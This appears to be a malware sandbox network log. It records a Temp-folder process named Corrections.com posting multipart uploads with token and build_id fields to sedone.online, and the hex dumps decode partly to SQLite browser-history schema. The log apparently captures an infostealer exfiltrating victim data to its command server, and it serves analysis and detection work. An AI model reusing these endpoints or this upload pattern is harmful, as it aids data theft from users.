2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-15 19:48:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49773	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:00 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEUKNOH47GVAAAAIM7GL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:00 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 4f 48 34 37 47 56 41 41 41 41 49 4d 37 47 4c 0d 0a 43 6f 6e 74 Data Ascii: ------IEUKNOH47GVAAAAIM7GLContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------IEUKNOH47GVAAAAIM7GLContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------IEUKNOH47GVAAAAIM7GLCont
2024-12-15 19:48:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:00 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:48:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49779	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:48:03 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S0RQI589Z58YU37GVKNO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 Data Ascii: ------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------S0RQI589Z58YU37GVKNOCont
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:48:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 